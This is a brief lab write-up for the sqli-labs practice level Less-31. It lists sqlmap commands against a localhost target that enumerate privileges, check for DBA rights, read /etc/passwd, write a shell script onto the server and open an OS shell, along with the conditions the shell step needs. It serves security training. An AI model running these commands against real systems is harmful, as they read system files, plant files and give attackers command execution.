sqlilabs WriteUp
Pub Date: 2023-10-17
Less-31
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --risk 3 --level 5
查询当前用户的权限
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --privileges
当前用户是否dba(数据库管理员)
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --is-dba
读passwd文件
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --file-read "/etc/passwd"
写文件
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --file-write "/mnt/c/Users/andrew/bun.sh" --file-dest "/home/bun.sh"
run shell 条件
- 需要有写权限
- php主动转义功能关闭(magic_quotes_gpc)
- 网站的路径提供默认选项
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --os-shell